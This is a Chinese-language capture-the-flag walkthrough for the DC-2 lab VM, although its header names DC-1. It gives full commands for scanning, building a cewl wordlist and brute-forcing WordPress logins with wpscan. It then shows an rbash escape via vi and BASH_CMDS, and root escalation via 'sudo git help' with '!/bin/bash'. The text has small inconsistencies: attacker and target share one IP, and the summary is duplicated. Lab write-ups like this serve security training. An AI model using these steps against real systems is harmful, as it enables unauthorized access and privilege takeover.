配置环境vmware17 + nat网络配置
下载地址:DC and Five86 Series Challenges - DC-1
(似乎从2024/1/18左右找不到这个资源了)
攻击机kali与其在同一网段下 ip:192.168.52.130
arp-scan -l #内网探测,扫描目标ip
发现目标ip192.168.52.130
使用nmap对目标进行扫描
nmap -T4 -sV -O -A -Pn -p- 192.168.52.130
发现开放端口80,7744
先访问80的http服务
这里域名跳转了,但是显示找不到此网站,挂上burpsuite,抓包查看情况
HTTP/1.1 301 Moved Permanently
Date: Thu, 18 Jan 2024 20:05:59
Server: Apache/2.4.10 (Debian)
Location: http://dc-2/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
工具数据包可知,网站回复301状态码,永久重定向
通过修改host文件,将ip地址和dc-2域名强行绑定,(host可以简单理解为对域名的解析处理,解析手动指定的ip地址,以便于绕过dns查询)
去掉这个勾选只读
然后用vscode打开host文件,在最底层添加一个
192.168.52.130 dc-2
此时直接打开网站
点开右上角的Flag
可以发现这是一个使用wordpress搭建的网站
flag中推荐使用cewl工具(一种使用ruby写的爬虫工具,可以爬取网站中的敏感信息组成字典,kali中自动集成了)
cewl http://dc-2 -w passwd.txt
再使用dirb挖掘目录信息
dirb http://dc-2/
发现一个url
http://dc-2/wp-admin/admin.php
这个url是wordpress搭建的网站的登录页面
关于wordpress搭建的站点,有一个非常好的工具,wpscan,可以利用其扫描功能对其测试
wpscan --url http://dc-2/ -e u //枚举用户名字
将这些人名写入文件中
echo "admin" >> usr.txt
echo "jerry" >> usr.txt
echo "tom" >> usr.txt
利用wpscan爆破账号密码
wpscan --url http://dc-2/ -U usr.txt -P passwd.txt
jerry / adipiscing
tom / parturient
分别利用进行登录
登录后如果是空白,再重新输入一下urlhttp://dc-2/wp-admin/即可
flag2的意思:在此wordpress中找不到有用的信息了,尝试其他方法
之前nmap扫描时发现了一个7744端口的ssh服务
基于此尝试ssh连接
ssh tom@192.168.52.130 -p 7744
这里只有tom的账号密码对了
同时发现很多命令无法使用
compgen -c //查看可以使用的指令
发现可以使用vi命令,此命令存在提权(本质上属于sudo提权)
先查看提示
vi flag3.txt
先提权然后查看jerry账号
操作步骤
vi随便打开文件
输入:
再下面添加
:set shell=/bin/sh
:shell
按回车,再次输入:
这时可以使用cd命令了,cd …找到上一层目录,进入Jerry文件夹下发现flag4,使用vi flag4.txt查看
权限过低,想办法提权
先使用exit退出
export -p //查看环境变量
BASH_CMDS[a]=/bin/sh;a //把/bin/sh给a
/bin/bash
export PATH=$PATH:/bin/ //添加环境变量
export PATH=$PATH:/usr/bin //添加环境变量
发现以及可以使用被限制的命令了
find / -perm -u=s -type f 2>/dev/null //找到存在sudo权限的命令
切换用户
su jerry
查看sudo权限
sudo -l
可以发现git命令存在sudo提权
基于此进行权限提升
方式:
sudo git help config #在末行命令模式输入
!/bin/bash 或 !'sh' #完成提权
sudo git -p help
!/bin/bash #输入!/bin/bash,即可打开一个用户为root的shell
输入sudo git help config后会有一个很长的文本,在此基础上,按下: ,在输入!/bin/bash
然后按q退出,再输出sudo git -p help命令,同上输入!/bin/bash
至此结束
1、hosts文件指定ip对应域名
2、工具使用:cewl(收集网站字典)、dirb(目录探测)、wpscan(针对wordpress制作的扫描工具)
3、linux命令
compgen -c #查看当前可用命令
find / -perm -u=s -type f 2>/dev/null #查找存在sudo权限的命令
sudo -l #查看当前用户可使用的sudo权限
6)]
[外链图片转存中…(img-UnDKf5oc-1705657141846)]
至此结束
1、hosts文件指定ip对应域名
2、工具使用:cewl(收集网站字典)、dirb(目录探测)、wpscan(针对wordpress制作的扫描工具)
3、linux命令
compgen -c #查看当前可用命令
find / -perm -u=s -type f 2>/dev/null #查找存在sudo权限的命令
sudo -l #查看当前用户可使用的sudo权限
4、权限提升:vi提权,rbash环境变量提权,git提权